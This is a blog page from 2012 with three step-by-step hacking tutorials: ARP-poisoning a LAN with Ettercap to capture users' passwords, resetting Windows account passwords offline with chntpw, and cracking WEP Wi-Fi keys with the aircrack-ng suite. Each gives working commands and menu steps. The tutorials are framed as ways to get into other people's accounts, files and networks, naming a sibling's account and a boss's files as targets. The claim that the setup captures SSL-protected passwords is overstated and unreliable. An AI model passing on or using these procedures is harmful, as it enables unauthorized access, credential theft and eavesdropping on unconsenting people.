Showing posts with label Backtrack. Show all posts
Showing posts with label Backtrack. Show all posts

Saturday, July 7, 2012

How to sniff Passwords in Wired/Wireless LAN Using Ettercap-Gtk. Man in the Middle Attack caused by ARP poisioning.

Aim of Tutorial : To sniff passwords from all the users in LAN by ARP Poisioning in Linux Backtrack5.

 
Ettercap:
Ettercap is a tool for network protocol analysis and security auditing. It has the ability to intercept traffic on a network, capture passwords, and conduct active eavesdropping against common protocols.

For this exercise I will be using ARP Poisoning to sniff the LAN for passwords that use SSL (Hotmail, Gmail, Etc.)

ARP:
“Address Resolution Protocol”: As defined by Wikipedia: ARP is a computer networking protocol for determining a network host's link layer or hardware address when only its Internet Layer (IP) or Network Layer address is known. This function is critical in local area networking as well as for routing internetworking traffic across gateways (routers) based on IP addresses when the next-hop router must be determined.
So in normal terms ARP is the way that we get a MAC address of a Host or Node from the IP address.

ARP Spoofing:
This is the technique we will use to attack a wired or a wireless network. ARP Spoofing allows the attacker to sniff data frames from the LAN, then gives you the ability to modify the traffic (good for redirecting to your own computer to download an exploit to victim), or stop the traffic from entering the network, or a specific computer (good for local DOS Attacks on a Local Area Network).

The idea behind the attack is to send a fake (AKA “Spoofed”) ARP message to the LAN. Any traffic on the network meant for that IP address that you attacked (whole network if you want) will be sent to the attacker. The attacker (you) can choose to forward the traffic to the actual gateway (Passive Sniffing) or modify the data before forwarding it (Man in the Middle).

How we will do it for this exercise:

1.> Edit a file:

We first have to edit one file (Don’t worry, we just have to delete two # signs to “uncomment” them).

The file we will be editing is called etter.conf and it can be found under the etc folder. (Full Path = /etc/etter.conf) with this command in terminal :-
                           gedit /etc/etter.conf

We need to change the part under the “redir_command_on/off” section.

MAKE SURE YOU ONLY UNCOMMENT THE TWO LINES UNDER “if you use iptables

The Linux subsection will look like this when done:
Code:
#---------------
#     Linux
#---------------

# if you use ipchains:
   #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
   #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Notice how there are no Hash (#) signs in front of the last two lines.

2.> Run Ettercap:

Now we can start Ettercap-GTK (This is a pretty version of the shell program, it gives us a nice GUI to play with). Ettercap-GTK can be found under: Menu -> Backtrack -> Privilege Escalation -> Spoofing -> Ettercap-GTK

3.> Setting up Sniffing:


Sniff -> Unified Sniffing

Eth0 -> OK ………………………..(This runs Sniffing on your first Ethernet card)

Hosts -> Scan for hosts ………… (Scans the network for targets)

Hosts -> Hosts List ………………….(Opens your hosts list



4.> Targeting the Hosts on the gateway:-


Now, you have all the computers on the network on the host list. If you want to only scan one computer (its better and quicker for us to just do the one) then click on the default gateway first, and click the target 1 button.

 After you do the default gateway, then click your computer you are attacking and make it “Target 2” by selecting it and clicking the “target 2” button.

5.> After setting up the sniffing:

Mitm -> ARP poisoning -> Select “Sniff remote connections” Hit OK

Start -> Start Sniffing

Your done! Now you are sniffing the computer for passwords onto certain websites that use SSL for their security. When you are done go to: Start -> Stop Sniffing, and then go to Mitm -> Stop mitm attack(s)


Note: If in case you wish to check whether the ARP poisoning was successful or not you can select Plugins from the menu bar and select, Check Poisson plugin, It takes a little while to show the message " Poisoning was successful :)"



Read more...

Thursday, July 5, 2012

Hack Windows Admin / User passwords using Linux Bactrack4

Want to hack your sister's or Brother's account or your boss's secret files at office ?? here's its one of the methods to do so.
Not only the username and pass words but also you can disable the "syskey" they have applied even before the windows users ask you for the password.



>> Boot backtrack 4 OS dvd or using pendrive.

>> Press >> Start button >> Backtrack >> Privelege Escalation >> Password attacks >> "chntpw".

This will open a "shell" or a command prompt in windows language.
>> At the last line, You should see "root@bt:~#" as command line.

>> At this line you should type the whole path of the SAM file located on Windows as follows:

chntpw -i /mnt/hda1/Windows/System32/config/SAM




>> If this doesnt work, then you should first locate the drive in which your windows is installed, for example, My windows is installed in "hda1" so i have written "hda1" in the above line. Also you should note the exact capital letters for "Windows" and "Sytem32" used.

>>Hit "enter" after the line, to see this window which is interactive to user showing several options like this:



1.>> Edit user data and password.
2.>> Syskey status and change it. etc.

>> At the last line you see "What to do? [1]->"
then just type the menu number in front of the desired hack, for example "1" and hit "enter". You should see this menu now:

>>> Type in the username which you wish to edit.
and select the menu options for it.

For example, type "josh" and select the menu no. from the list below:



1.>> Clear user password.
2.>> Edit user password.
3.>> Promote user.
and many more.



>> After doing the task select "quit" and boot back to windows with administrator rights or to see user's data inside windows.
Read more...

Sunday, July 1, 2012

Hacking Wi-Fi WEP - Key Protected Networks Using Bactrack 4, 5

Aim Of Tutorial: Hacking Wi-fi Network secured with WEP key Encryption





Hi everyone, Today am here to how you a very simple and effective way to hack Wi-Fi network secured with WEP key.



Please follow the steps given below accurately:-

1.> Boot Backtrack 5 in normal Text-Mode (1st Choice) when booting menu appears, then enter startx for starting GUI interface of BT5.

2.> Open a Terminal, type the following commands:-

airmon-ng start wlan0
 
This command will list the available WLAN (Wi-Fi card available in System) and also
Show the another name of the same Wi-Fi card such as mon0.
We will now onwards use the mon0 interface name in all the following commands.
The Wi-Fi card is now in monitor mode.
 
3.> Now in the Same Terminal window, Type: 
 
airodump-ng mon0
 
This will list all the Wireless LAN networks Available nearby, 
To Stop the scanning after noticing the target Wi-Fi network, Press cntrl+c
  
4.>Copy the MAC-ID or BSSID of the target network. For example,00:11:22:33:44:55,
 also note down the channel number ( my case was 3).
 
Now type the following Command in the Terminal,
 
 airodump-ng -c 3 -w wep  --bssid  00:11:22:33:44:55 mon0
 
5.> Open a New Terminal, and type:

              aireplay-ng -1 0 -a 00:11:22:33:44:55 mon0
 
 (if you see under #Data, you will notice its increasing slowly)
To Speed this #data value,
 
6.> Again Open a new Terminal and type:
 
        aireplay-ng -3 –b 00:11:22:33:44:55 mon0

--> wait till data reaches 30,000
7.> In capturing window, Press cntrl+C to top capturing data.
 
8.> Use the following command to list the Directory of saved captured Files. 

                                Dir
9.> Then, Type:
   
Aircrack-ng wep-01.cap
 
to crack the Wi-Fi password by mentioning the capture file (wep-01.cap).
 
10.> Now you jut have to wait, until the WEP-Key is Found.
 
11.> Please note that, some routers only Show HEX digits of the WEP key
To use this key in Windows to log on to a Wireless Network, Do not include
the Colons (:) between the HEX Pairs.
 
For Example, If you got the Key like 1A:2B:3C:4D:5F, then in windows while
connecting to the hacked Wi-Fi Network, use 1A2B3C4D5F (w/O colon sign).
!! Enjoy !! 


Read more...

Related Posts Plugin for WordPress, Blogger...